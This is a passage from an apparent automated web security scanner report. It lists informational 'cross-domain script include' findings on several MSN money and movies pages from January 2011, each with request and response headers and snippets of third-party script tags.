X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 24654


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...
<link rel="search" type="application/opensearchdescription+xml" title="Live Search" href="http://www.live.com/live/search/search.xml" /><script type="text/javascript" src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js"></script>
...[SNIP]...

23.205. http://redacted/investor/market/commodities.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://moneycentral.msn.com
Path:   /investor/market/commodities.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /investor/market/commodities.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:13:08 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 27551

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"><head><meta http-e
...[SNIP]...
<meta http-equiv="X-FRAME-OPTIONS" content="DENY" /><script type="text/javascript" src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js"></script>
...[SNIP]...
<div style="display:none"><script type="text/javascript" src="https://secure.footprint.net/bstmsn/br/om/js/s_code.js"></script>
...[SNIP]...

23.206. http://redacted/investor/market/earncalendar/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://moneycentral.msn.com
Path:   /investor/market/earncalendar/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /investor/market/earncalendar/ HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:13:26 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
pragma: no-cache
Content-Length: 19872
Content-Type: text/html
Expires: Sun, 30 Jan 2011 02:13:26 GMT
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
<tit
...[SNIP]...
/redacted" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 3) gen true for "http://moneycentral.msn.com" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 3))' />
<script type="text/javascript" src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js"></script>
...[SNIP]...

23.207. http://redacted/investor/market/exchangerates.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://moneycentral.msn.com
Path:   /investor/market/exchangerates.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /investor/market/exchangerates.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:13:26 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 28682

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"><head><meta http-e
...[SNIP]...
<meta http-equiv="X-FRAME-OPTIONS" content="DENY" /><script type="text/javascript" src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js"></script>
...[SNIP]...
<div style="display:none"><script type="text/javascript" src="https://secure.footprint.net/bstmsn/br/om/js/s_code.js"></script>
...[SNIP]...

23.208. http://redacted/investor/market/treasuries.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://moneycentral.msn.com
Path:   /investor/market/treasuries.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /investor/market/treasuries.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:13:09 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 23413

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"><head><meta http-e
...[SNIP]...
<meta http-equiv="X-FRAME-OPTIONS" content="DENY" /><script type="text/javascript" src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js"></script>
...[SNIP]...
<div style="display:none"><script type="text/javascript" src="https://secure.footprint.net/bstmsn/br/om/js/s_code.js"></script>
...[SNIP]...

23.209. http://redacted/investor/market/usindex.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://moneycentral.msn.com
Path:   /investor/market/usindex.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /investor/market/usindex.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:13:06 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 35449

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"><head><meta http-e
...[SNIP]...
<meta http-equiv="X-FRAME-OPTIONS" content="DENY" /><script type="text/javascript" src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js"></script>
...[SNIP]...
<div style="display:none"><script type="text/javascript" src="https://secure.footprint.net/bstmsn/br/om/js/s_code.js"></script>
...[SNIP]...

23.210. http://redacted/investor/market/worldmarkets.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://moneycentral.msn.com
Path:   /investor/market/worldmarkets.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /investor/market/worldmarkets.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:13:21 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 31583

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"><head><meta http-e
...[SNIP]...
<meta http-equiv="X-FRAME-OPTIONS" content="DENY" /><script type="text/javascript" src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js"></script>
...[SNIP]...
<div style="display:none"><script type="text/javascript" src="https://secure.footprint.net/bstmsn/br/om/js/s_code.js"></script>
...[SNIP]...

23.211. http://redacted/investor/partsub/funds/etfperformancetracker.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://moneycentral.msn.com
Path:   /investor/partsub/funds/etfperformancetracker.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /investor/partsub/funds/etfperformancetracker.aspx?fam=&cat=&p=0&tab=mkt&s=ytd&o=d HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:12:53 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 64260


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...
<link rel="search" type="application/opensearchdescription+xml" title="Live Search" href="http://www.live.com/live/search/search.xml" /><script type="text/javascript" src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js"></script>
...[SNIP]...

23.212. http://redacted/investor/partsub/funds/topfunds.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://moneycentral.msn.com
Path:   /investor/partsub/funds/topfunds.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /investor/partsub/funds/topfunds.asp HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:12:56 GMT
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Server: TK2MCWBA01
cache-control: private
pragma: no-cache
Content-Length: 28823
Content-Type: text/html
Expires: Sun, 30 Jan 2011 02:12:56 GMT
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
<tit
...[SNIP]...
/redacted" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 3) gen true for "http://moneycentral.msn.com" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 3))' />
<script type="text/javascript" src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js"></script>
...[SNIP]...

23.213. http://redacted/investor/quotewatchlist.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://moneycentral.msn.com
Path:   /investor/quotewatchlist.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /investor/quotewatchlist.asp HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:13:32 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
cache-control: private
pragma: no-cache
Content-Length: 22945
Content-Type: text/html
Expires: Sun, 30 Jan 2011 02:13:32 GMT
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns:Web xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
redacted" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 3) gen true for "http://moneycentral.msn.com" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 3))' />

<script src="http://js.shared.live.com/2EGC9CgiideKzgDVwrdAdQ/liveframework.js"></script>
<script type="text/javascript" src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.js"></script>
...[SNIP]...

23.214. http://redacted/money.search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://moneycentral.msn.com
Path:   /money.search

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /money.search HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:15:34 GMT
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Server: TK2MCWBA01
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 21441


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...
<link rel="search" type="application/opensearchdescription+xml" title="Live Search" href="http://www.live.com/live/search/search.xml" /><script type="text/javascript" src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js"></script>
...[SNIP]...

23.215. http://movies.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://movies.redacted
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: movies.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 88675
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=8a183991ad5843ecb33290e9ed7a7542; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:48:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   MSN Movies
...[SNIP]...
</script>
<script src="http://help.live.com/resources/neutral/launchhelp.js" type="text/javascript"></script>
...[SNIP]...
<!-- start Vibrant Media IntelliTXT script section --><script type="text/javascript" src="http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js"></script>
...[SNIP]...

23.216. http://movies.redacted/academy-awards/snubs/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://movies.redacted
Path:   /academy-awards/snubs/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /academy-awards/snubs/ HTTP/1.1
Host: movies.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 43284
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=315a7361d2a9433cbd6de273a6f46301; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:48:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   2011 Acade
...[SNIP]...
</LINK>

<script type="text/javascript" language="javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<![endif]-->
<script src="http://help.live.com/resources/neutral/launchhelp.js" type="text/javascript"></script>
...[SNIP]...
</DIV> <SCRIPT src="http://connect.facebook.net/en_US/all.js#appId=166839766683429&xfbml=1"></SCRIPT>
...[SNIP]...
<!-- start Vibrant Media IntelliTXT script section --><script type="text/javascript" src="http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js"></script>
...[SNIP]...

23.217. http://movies.redacted/jason-statham/photo-gallery/feature/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://movies.redacted
Path:   /jason-statham/photo-gallery/feature/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /jason-statham/photo-gallery/feature/ HTTP/1.1
Host: movies.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 38350
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=bd071d931c99456bbb919ea6d508c2bf; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:48:32 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   A Beginner
...[SNIP]...
</style>


<script src="http://help.live.com/resources/neutral/launchhelp.js" type="text/javascript"></script>
...[SNIP]...
<!-- start Vibrant Media IntelliTXT script section --><script type="text/javascript" src="http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js"></script>
...[SNIP]...

23.218. http://movies.redacted/mom-pop-culture/tiger-mom-movie/story-feature/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://movies.redacted
Path:   /mom-pop-culture/tiger-mom-movie/story-feature/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /mom-pop-culture/tiger-mom-movie/story-feature/ HTTP/1.1
Host: movies.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 48526
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=edacaf4cfdd14387b49aebcecaca1296; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:48:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Mom &amp;
...[SNIP]...
<![endif]-->
<script src="http://help.live.com/resources/neutral/launchhelp.js" type="text/javascript"></script>
...[SNIP]...
<!-- start Vibrant Media IntelliTXT script section --><script type="text/javascript" src="http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js"></script>
...[SNIP]...

23.219. http://movies.redacted/new-on-dvd/movies/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://movies.redacted
Path:   /new-on-dvd/movies/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /new-on-dvd/movies/ HTTP/1.1
Host: movies.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 48135
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=644af2bf6b11442a9276943bf18262ae; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:48:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Movies New
...[SNIP]...
<![endif]-->
<script src="http://help.live.com/resources/neutral/launchhelp.js" type="text/javascript"></script>
...[SNIP]...
<!-- start Vibrant Media IntelliTXT script section --><script type="text/javascript" src="http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js"></script>
...[SNIP]...

23.220. http://movies.redacted/paralleluniverse/5-demonic-possession-movies/story/across-the-universe/

Summary

Severity:   Information
Confidence:   Certain
